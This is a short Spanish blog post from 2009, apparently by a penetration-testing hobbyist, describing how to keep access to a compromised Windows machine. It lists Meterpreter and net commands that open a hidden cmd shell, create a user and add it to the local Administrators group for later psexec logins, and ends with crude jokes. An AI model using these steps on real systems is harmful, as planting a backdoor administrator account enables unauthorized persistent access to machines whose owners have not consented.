Bueno, el titulo es mentira ;) los ususarios los creamos desde una shell normal y corriente, pero como soy un adicto del hashdump me gusta entrar por la puerta grande.
Uno de los primeros pasos una vez comprometido un sistema es volcar credenciales, informacion es poder, pero si vamos con la hora pegada o estamos sobre el alambre, no esta de mas crearse un usuario para futuros psexec.
Vamos por pasos:
1. Arrancamos un cmd:
execute -H -f cmd.exe -i
2. Creamos un usuario:
net user $usuario $password /add
3. Lo añadimos al grupo de administradores:
net localgroup Administradores $usuario /add
4. Y comprobamos:
net localgroup Administradores
Sacamos una Guinness, nos la bebemos, eructamos y nos hacemos socios del Club Empirico de Amigos del Priapismo (CEAP).
miércoles, 22 de julio de 2009
Suscribirse a:
Entradas (Atom)
